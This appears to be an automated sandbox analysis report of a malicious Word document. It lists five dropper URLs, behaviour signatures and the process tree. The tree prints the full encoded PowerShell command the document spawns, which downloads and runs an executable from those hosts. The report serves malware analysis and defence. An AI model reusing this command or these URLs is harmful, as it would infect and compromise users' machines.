Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    18-12-2019 19:01

General

  • Target

    9fad5afc424df291ee9109a6b261f565d68c2f245b0afa715f0551e82930e157

  • Sample

    191218-3em72zhv3n

  • SHA256

    9fad5afc424df291ee9109a6b261f565d68c2f245b0afa715f0551e82930e157

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://silverswiss.com/wp-includes/t5gp93/

exe.dropper

http://golford.com/wp-includes/nhens61255/

exe.dropper

https://limraitech.com/wp/2uknv7403/

exe.dropper

http://wdbusinessconsultant.com/wp-includes/uzse8/

exe.dropper

https://traceidentified.com/ranchLib/g5ynhrm62391/

Signatures

  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9fad5afc424df291ee9109a6b261f565d68c2f245b0afa715f0551e82930e157.doc" /o ""
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4936
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABVAHEAbgB0AGMAdQBxAGgAaQByAGMAZwA9ACcAWgB5AG8AbABsAHQAZQB6AGUAaAB3ACcAOwAkAFUAYQB6AG0AdgBzAHAAeQBnAHIAZABqACAAPQAgACcAMQA0ADUAJwA7ACQAWABvAG4AbQBtAHMAaQB4AD0AJwBBAGMAYwBuAHMAaQBrAG8AbQB4AHkAaQAnADsAJABCAGQAZwBxAHcAegBrAGMAbwBqAGwAZAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQBhAHoAbQB2AHMAcAB5AGcAcgBkAGoAKwAnAC4AZQB4AGUAJwA7ACQAWAB0AG4AdQBsAGYAdwB5AHMAbwBqAHQAPQAnAFQAbgBqAGMAYwB2AGsAagByAHIAZwAnADsAJABBAGkAaQBtAG8AcgBzAHMAegBxAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBCAEMATABpAGUATgBUADsAJABHAGsAeQBtAHIAbABvAGkAeQBmAHEAdAA9ACcAaAB0AHQAcABzADoALwAvAHMAaQBsAHYAZQByAHMAdwBpAHMAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdAA1AGcAcAA5ADMALwAqAGgAdAB0AHAAOgAvAC8AZwBvAGwAZgBvAHIAZAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbgBoAGUAbgBzADYAMQAyADUANQAvACoAaAB0AHQAcABzADoALwAvAGwAaQBtAHIAYQBpAHQAZQBjAGgALgBjAG8AbQAvAHcAcAAvADIAdQBrAG4AdgA3ADQAMAAzAC8AKgBoAHQAdABwADoALwAvAHcAZABiAHUAcwBpAG4AZQBzAHMAYwBvAG4AcwB1AGwAdABhAG4AdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdQB6AHMAZQA4AC8AKgBoAHQAdABwAHMAOgAvAC8AdAByAGEAYwBlAGkAZABlAG4AdABpAGYAaQBlAGQALgBjAG8AbQAvAHIAYQBuAGMAaABMAGkAYgAvAGcANQB5AG4AaAByAG0ANgAyADMAOQAxAC8AJwAuACIAcwBgAFAAbABpAFQAIgAoACcAKgAnACkAOwAkAEgAcgBlAGQAbwBsAHUAbwBzAGYAbgBsAHEAPQAnAEoAbgBkAHoAZAB1AHYAeQAnADsAZgBvAHIAZQBhAGMAaAAoACQAWgBvAGoAbQB6AGEAZQB0AHIAIABpAG4AIAAkAEcAawB5AG0AcgBsAG8AaQB5AGYAcQB0ACkAewB0AHIAeQB7ACQAQQBpAGkAbQBvAHIAcwBzAHoAcQAuACIARABgAE8AVwBuAGwAbwBBAGQARgBgAGkATABlACIAKAAkAFoAbwBqAG0AegBhAGUAdAByACwAIAAkAEIAZABnAHEAdwB6AGsAYwBvAGoAbABkACkAOwAkAEcAaABoAG8AYgB2AG8AcABpAHAAaABvAGsAPQAnAEoAYQBhAGkAdgBxAG0AegBqACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQgBkAGcAcQB3AHoAawBjAG8AagBsAGQAKQAuACIATABFAGAATgBgAGcAdABoACIAIAAtAGcAZQAgADMAOQA3ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAQQBgAFIAdAAiACgAJABCAGQAZwBxAHcAegBrAGMAbwBqAGwAZAApADsAJABIAHMAYwBtAHMAcABnAGkAZABuAGEAPQAnAFoAdwBoAGcAdQB2AGQAaQBxAHUAJwA7AGIAcgBlAGEAawA7ACQAUQB0AGcAdQBoAHkAbwB5AGgAaAB3AGcAPQAnAFkAZABtAGUAdwBhAGoAeQB3AHQAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGEAZwBxAHkAagBzAGIAdwBhAG8APQAnAEwAcwBjAHMAYQBiAGQAZgB3AHoAdgAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4660

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4936-2-0x000002003DDE5000-0x000002003DDE8000-memory.dmp

    Filesize

    12KB